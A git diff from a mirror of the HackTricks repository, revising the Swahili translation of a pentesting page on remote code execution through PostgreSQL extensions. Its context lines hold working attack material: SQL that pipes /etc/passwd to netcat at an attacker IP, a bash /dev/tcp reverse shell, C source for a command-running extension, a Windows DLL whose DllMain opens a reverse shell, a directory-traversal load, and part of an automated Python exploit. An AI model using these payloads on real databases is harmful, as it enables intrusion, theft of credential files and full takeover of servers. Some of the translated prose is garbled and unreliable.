Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-25 22:20:43 +00:00
Code Issues Projects Releases Packages Wiki Activity

Translated ['pentesting-web/sql-injection/postgresql-injection/rce-with-

Browse source
This commit is contained in:
Translator 2024-07-17 17:56:22 +00:00
parent 10fab72e70
commit e2aba4bb2e
1 changed files with 47 additions and 45 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

92
pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
View file

@ -1,30 +1,30 @@
# RCE na Vipengele vya PostgreSQL
# RCE na Vifaa vya PostgreSQL
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
* Je! Unafanya kazi katika **kampuni ya usalama wa mtandao**? Je! Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swagi rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>
## Vipengele vya PostgreSQL
## Vifaa vya PostgreSQL
PostgreSQL imeendelezwa na uwezo wa kuongeza vipengele kama sehemu muhimu, kuruhusu kuunganisha vipengele kama kama vile kazi, waendeshaji, au aina za ziada kama kama vile zilijengwa kwenye programu.
PostgreSQL imeendelezwa na uwezo wa kuongeza vifaa kama kipengele muhimu, ikiruhusu kuunganisha vifaa kama kama vile zilijengwa kwa kazi. Vifaa hivi, kimsingi maktaba zilizoandikwa kwa C, huongeza database na kazi, waendeshaji, au aina zaidi.
Kuanzia toleo la 8.1 na kuendelea, kuna mahitaji maalum yanayowekwa kwa maktaba za vipengele: lazima zikusanywe na kichwa maalum. Bila hii, PostgreSQL haitazitekeleza, ikisaidia matumizi ya vipengele vinavyolingana na pengine salama.
Kuanzia toleo la 8.1 na kuendelea, mahitaji maalum yanawekwa kwa maktaba za vifaa: lazima zipatewa kichwa maalum. Bila hii, PostgreSQL haitazitekeleza, ikidhibitisha matumizi ya vifaa vinavyolingana na vinavyoweza kuwa salama.
Pia, kumbuka kwamba **iwapo hujui jinsi ya** [**kupakia faili kwa kudhuru PostgreSQL unapaswa kusoma chapisho hili.**](big-binary-files-upload-postgresql.md)
Pia, kumbuka kwamba **ikiwa hujui jinsi ya** [**kupakia faili kwa kumdhuru PostgreSQL unapaswa kusoma chapisho hili.**](big-binary-files-upload-postgresql.md)
### RCE katika Linux
**Kwa maelezo zaidi angalia: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**
**Kwa habari zaidi angalia: [https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/](https://www.dionach.com/blog/postgresql-9-x-remote-command-execution/)**
Utekelezaji wa amri za mfumo kutoka kwa PostgreSQL toleo la 8.1 na toleo la awali ni mchakato ambao umeelezwa wazi na ni rahisi. Inawezekana kutumia hii: [Moduli ya Metasploit](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).
Utekelezaji wa amri za mfumo kutoka PostgreSQL 8.1 na matoleo ya awali ni mchakato ulioandikwa wazi na wa moja kwa moja. Ni rahisi kutumia hii: [Moduli ya Metasploit](https://www.rapid7.com/db/modules/exploit/linux/postgres/postgres_payload).
```sql
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT;
SELECT system('cat /etc/passwd | nc <attacker IP> <attacker port>');
@ -36,9 +36,9 @@ CREATE OR REPLACE FUNCTION close(int) RETURNS int AS '/lib/libc.so.6', 'close' L
```
<details>
<summary>Andika faili ya binary kutoka kwa base64</summary>
<summary>Andika faili ya binary kutoka base64</summary>
Ili kuandika faili ya binary katika postgres unaweza kuhitaji kutumia base64, hii itakuwa na manufaa kwa jambo hilo:
Ili kuandika binary ndani ya faili katika postgres unaweza kuhitaji kutumia base64, hii itakuwa na manufaa kwa hilo:
```sql
CREATE OR REPLACE FUNCTION write_to_file(file TEXT, s TEXT) RETURNS int AS
$$
@ -78,31 +78,31 @@ $$ LANGUAGE 'plpgsql';
```
</details>
Hata hivyo, wakati jaribio lilifanywa kwenye toleo kubwa **kosa lifuatalo lilionyeshwa**:
Walakini, wakati jaribio lilipofanywa kwenye toleo kubwa **kosa lifuatalo lilionyeshwa**:
```c
ERROR: incompatible library “/lib/x86_64-linux-gnu/libc.so.6”: missing magic block
HINT: Extension libraries are required to use the PG_MODULE_MAGIC macro.
```
Kosa hili limeelezewa katika [hati ya PostgreSQL](https://www.postgresql.org/docs/current/static/xfunc-c.html):
Hitilafu hii imeelezewa katika [hati ya PostgreSQL](https://www.postgresql.org/docs/current/static/xfunc-c.html):
> Ili kuhakikisha kuwa faili ya kitu iliyopakuliwa kwa kudumu haijapakiwa kwenye seva isiyolingana, PostgreSQL inachunguza kuwa faili ina "block ya uchawi" na maudhui sahihi. Hii inaruhusu seva kugundua tofauti wazi, kama vile nambari iliyokompiliwa kwa toleo kuu tofauti ya PostgreSQL. Block ya uchawi inahitajika kuanzia PostgreSQL 8.2. Ili kuongeza block ya uchawi, andika hii kwenye moja (na moja tu) ya faili za chanzo za moduli, baada ya kuingiza kichwa cha fmgr.h:
> Ili kuhakikisha kwamba faili ya kitu kilichopakiwa kwa kudhaminiwa haipakiwi kwenye seva isiyolingana, PostgreSQL huchunguza ikiwa faili ina "block ya uchawi" yenye maudhui sahihi. Hii inaruhusu seva kugundua kutofautiana wazi, kama vile nambari iliyokompiliwa kwa toleo kuu tofauti la PostgreSQL. Block ya uchawi inahitajika kuanzia PostgreSQL 8.2. Ili kuingiza block ya uchawi, andika hivi kwenye moja (na moja tu) ya faili za chanzo cha moduli, baada ya kuingiza kichwa cha fmgr.h:
>
> `#ifdef PG_MODULE_MAGIC`\
> `PG_MODULE_MAGIC;`\
> `#endif`
Tangu toleo la PostgreSQL 8.2, mchakato wa mtu anayeshambulia mfumo umefanywa kuwa mgumu zaidi. Mshambuliaji anahitajika kutumia maktaba ambayo tayari ipo kwenye mfumo au kupakia maktaba ya desturi. Maktaba hii ya desturi lazima ichapishwe kulingana na toleo kuu linalolingana la PostgreSQL na lazima iwe na "block ya uchawi" maalum. Hatua hii inaongeza sana ugumu wa kushambulia mifumo ya PostgreSQL, kwani inahitaji ufahamu wa kina wa muundo na utangamano wa toleo la mfumo.
Tangu toleo la PostgreSQL 8.2, mchakato wa mpandikizaji kutumia mfumo umefanywa kuwa mgumu zaidi. Mpandikizaji anahitajika kutumia maktaba ambayo tayari ipo kwenye mfumo au kupakia maktaba ya desturi. Maktaba hii ya desturi lazima iwe imeshaandaliwa dhidi ya toleo kuu linalolingana la PostgreSQL na lazima ijumuishe "block ya uchawi" maalum. Hatua hii inaongeza sana ugumu wa kutumia mifumo ya PostgreSQL, kwani inahitaji uelewa wa kina wa usanifu wa mfumo na uendanao wa toleo.
#### Chapisha maktaba
#### Andika maktaba
Pata toleo la PostgreSQL kwa kutumia:
Pata toleo la PostgreSQL kwa:
```sql
SELECT version();
PostgreSQL 9.6.3 on x86_64-pc-linux-gnu, compiled by gcc (Debian 6.3.0-18) 6.3.0 20170516, 64-bit
```
Kwa ajili ya utangamano, ni muhimu kwamba toleo kuu zinafanana. Kwa hiyo, kuchapisha maktaba na toleo lolote ndani ya mfululizo wa 9.6.x itahakikisha kuunganishwa kwa mafanikio.
Kwa utangamano, ni muhimu kwamba toleo kuu zilingane. Kwa hivyo, kuchanganya maktaba na toleo lolote ndani ya mfululizo wa 9.6.x inapaswa kuhakikisha ushirikiano mafanikio.
Kuweka toleo hilo katika mfumo wako:
Kufunga toleo hilo kwenye mfumo wako:
```bash
apt install postgresql postgresql-server-dev-9.6
```
@ -123,19 +123,19 @@ char* command = PG_GETARG_CSTRING(0);
PG_RETURN_INT32(system(command));
}
```
Kisha pakia maktaba iliyokusanywa na tekeleza amri zifuatazo:
Kisha pakia maktaba iliyoundwa na tekeleza amri kwa:
```bash
CREATE FUNCTION sys(cstring) RETURNS int AS '/tmp/pg_exec.so', 'pg_exec' LANGUAGE C STRICT;
SELECT sys('bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1"');
#Notice the double single quotes are needed to scape the qoutes
```
Unaweza kupata **maktaba iliyopangwa mapema** kwa toleo kadhaa tofauti za PostgreSQL na hata unaweza **kuautomatisha mchakato** huu (ikiwa una ufikiaji wa PostgreSQL) na:
Unaweza kupata hii **maktaba iliyopangwa mapema** kwa toleo kadhaa tofauti za PostgreSQL na hata unaweza **kutumia mchakato huu** (ikiwa una ufikiaji wa PostgreSQL) na:
{% embed url="https://github.com/Dionach/pgexec" %}
### RCE katika Windows
DLL ifuatayo inachukua kama kuingiza **jina la binary** na **idadi** ya **mara** unayotaka kuitekeleza na kuitekeleza:
DLL ifuatayo inachukua kama matokeo **jina la binary** na **idadi** ya **nyakati** unayotaka kuitekeleza na kuitekeleza:
```c
#include "postgres.h"
#include <string.h>
@ -176,13 +176,13 @@ Unaweza kupata DLL iliyokompiliwa katika zip hii:
{% file src="../../../.gitbook/assets/pgsql_exec.zip" %}
Unaweza kuonyesha kwa DLL hii **ambayo faili ya binary itekelezwe** na idadi ya mara itekelezwe, katika mfano huu itatekeleza `calc.exe` mara 2:
Unaweza kuashiria kwa DLL hii **binary gani ifanyike** na idadi ya mara za kuitekeleza, kwa mfano itatekeleza `calc.exe` mara 2:
```bash
CREATE OR REPLACE FUNCTION remote_exec(text, integer) RETURNS void AS '\\10.10.10.10\shared\pgsql_exec.dll', 'pgsql_exec' LANGUAGE C STRICT;
SELECT remote_exec('calc.exe', 2);
DROP FUNCTION remote_exec(text, integer);
```
Katika [**hapa**](https://zerosum0x0.blogspot.com/2016/06/windows-dll-to-shell-postgres-servers.html) unaweza kupata reverse-shell ifuatayo:
Katika [**hapa**](https://zerosum0x0.blogspot.com/2016/06/windows-dll-to-shell-postgres-servers.html) unaweza kupata reverse-shell hii:
```c
#define PG_REVSHELL_CALLHOME_SERVER "10.10.10.10"
#define PG_REVSHELL_CALLHOME_PORT "4444"
@ -260,36 +260,38 @@ int32 arg = PG_GETARG_INT32(0);
PG_RETURN_INT32(arg + 1);
}
```
Tazama jinsi katika kesi hii **msimbo mbaya uko ndani ya kazi ya DllMain**. Hii inamaanisha kuwa katika kesi hii sio lazima kutekeleza kazi iliyopakiwa katika postgresql, tu **kupakia DLL** kutatekeleza kabisa kifaa cha kuingia nyuma:
Tafadhali angalia jinsi **mimba mbaya iko ndani ya kazi ya DllMain**. Hii inamaanisha kwamba katika kesi hii si lazima kutekeleza kazi iliyojazwa katika postgresql, tu **kupakia DLL** kutatekeleza kabisa kabati la kurudi:
```c
CREATE OR REPLACE FUNCTION dummy_function(int) RETURNS int AS '\\10.10.10.10\shared\dummy_function.dll', 'dummy_function' LANGUAGE C STRICT;
```
[Mradi wa PolyUDF](https://github.com/rop-la/PolyUDF) pia ni mwanzo mzuri na mradi kamili wa MS Visual Studio na maktaba tayari kutumika (ikiwa ni pamoja na: _amri eval_, _exec_ na _cleanup_) na msaada wa toleo nyingi.
### RCE katika toleo jipya la Prostgres
Katika **toleo jipya** la PostgreSQL, vizuizi vimeanzishwa ambapo `superuser` amekatazwa **kupakia** faili za maktaba zinazoshirikishwa isipokuwa kutoka kwenye saraka maalum, kama vile `C:\Program Files\PostgreSQL\11\lib` kwenye Windows au `/var/lib/postgresql/11/lib` kwenye mifumo ya \*nix. Saraka hizi zime **lindwa** dhidi ya shughuli za kuandika kwa kutumia akaunti za NETWORK\_SERVICE au postgres.
Katika **toleo jipya zaidi** la PostgreSQL, vizuizi vimeletwa ambapo `superuser` amekatazwa kutoa faili za maktaba za pamoja isipokuwa kutoka kwenye saraka maalum, kama vile `C:\Program Files\PostgreSQL\11\lib` kwenye Windows au `/var/lib/postgresql/11/lib` kwenye mifumo ya \*nix. Saraka hizi zime **lindwa** dhidi ya operesheni za kuandika na akaunti za NETWORK\_SERVICE au postgres.
Licha ya vizuizi hivi, ni **wawezekano** kwa mtumiaji aliye na ruhusa ya `superuser` kwenye hifadhidata kuandika faili za binary kwenye mfumo wa faili kwa kutumia "vitu vikubwa" (large objects). Uwezo huu unajumuisha kuandika ndani ya saraka ya `C:\Program Files\PostgreSQL\11\data`, ambayo ni muhimu kwa shughuli za hifadhidata kama vile kusasisha au kuunda meza.
Licha ya vizuizi hivi, ni **kawaida** kwa mtumiaji wa **superuser** wa database aliyethibitishwa kuandika faili za binary kwenye mfumo wa faili kwa kutumia "vitu kubwa." Uwezo huu unajumuisha kuandika ndani ya saraka ya `C:\Program Files\PostgreSQL\11\data`, ambayo ni muhimu kwa operesheni za database kama vile kuboresha au kuunda meza.
Tatizo kubwa linatokea kutokana na amri ya `CREATE FUNCTION`, ambayo **inaruhusu kuvuka saraka** na kuingia kwenye saraka ya data. Kwa hivyo, mtu aliye na ruhusa anaweza **kutumia kuvuka hii** kuandika faili ya maktaba inayoshirikishwa kwenye saraka ya data na kisha **kuipakia**. Shambulio hili linawezesha mtu kutekeleza nambari yoyote, kufikia utekelezaji wa nambari ya asili kwenye mfumo.
Ugumu mkubwa unatokea kutokana na amri ya `CREATE FUNCTION`, ambayo **inaruhusu upitishaji wa saraka** ndani ya saraka ya data. Kufuatia hivyo, muhusika aliyeidhinishwa anaweza **kutumia upitishaji huu** kuandika faili ya maktaba ya pamoja ndani ya saraka ya data na kisha **kuiload**. Udukuzi huu unamwezesha muhusika kutekeleza msimbo wowote, kufikia utekelezaji wa msimbo wa asili kwenye mfumo.
#### Mchakato wa Shambulio
#### Mzunguko wa Shambulizi
Kwanza kabisa, unahitaji **kutumia vitu vikubwa kuweka dll**. Unaweza kuona jinsi ya kufanya hivyo hapa:
Kwanza kabisa unahitaji **kutumia vitu vikubwa kusasisha dll**. Unaweza kuona jinsi ya kufanya hivyo hapa:
{% content-ref url="big-binary-files-upload-postgresql.md" %}
[big-binary-files-upload-postgresql.md](big-binary-files-upload-postgresql.md)
{% endcontent-ref %}
Baada ya kupakia kifaa cha nyongeza (kikiwa na jina la poc.dll kwa mfano huu) kwenye saraka ya data, unaweza kukiweka kwa kutumia:
Baada ya kupakia ugani (ukiwa na jina la poc.dll kwa mfano huu) kwenye saraka ya data unaweza kuiload na:
```c
create function connect_back(text, integer) returns void as '../data/poc', 'connect_back' language C strict;
select connect_back('192.168.100.54', 1234);
```
_Note kwamba hauhitaji kuongeza kifungu cha `.dll` kwa sababu kazi ya kuunda itaongeza yenyewe._
_Chukua kufahamu kwamba hauitaji kuongeza kificho cha `.dll` kwani kazi ya kuunda itaongeza hiyo._
Kwa habari zaidi **soma** [**uchapishaji halisi hapa**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
Katika uchapishaji huo **hii ilikuwa** [**nambari iliyotumiwa kuunda kifaa cha postgres**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_ili kujifunza jinsi ya kutekeleza kifaa cha postgres soma toleo lolote la awali_).\
Katika ukurasa huo huo **exploit ya kiotomatiki** ya mbinu hii ilipewa:
Kwa habari zaidi **soma** [**machapisho ya asili hapa**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
Katika chapisho hilo **hili lilikuwa** [**kificho kinachotumika kuunda kifaa cha postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_ili kujifunza jinsi ya kutekeleza kifaa cha postgres soma mojawapo ya toleo la awali_).\
Kwenye ukurasa huo huo **shambulio la kiotomatiki** la mbinu hii lilipewa:
```python
#!/usr/bin/env python3
import sys
@ -334,12 +336,12 @@ print(" drop function connect_back(text, integer);")
<details>
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Jifunze AWS hacking kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, ungependa kuona **kampuni yako ikionekana katika HackTricks**? Au ungependa kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa muundo wa PDF**? Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **nifuate** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye repo ya [hacktricks](https://github.com/carlospolop/hacktricks) na [hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Je, unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
</details>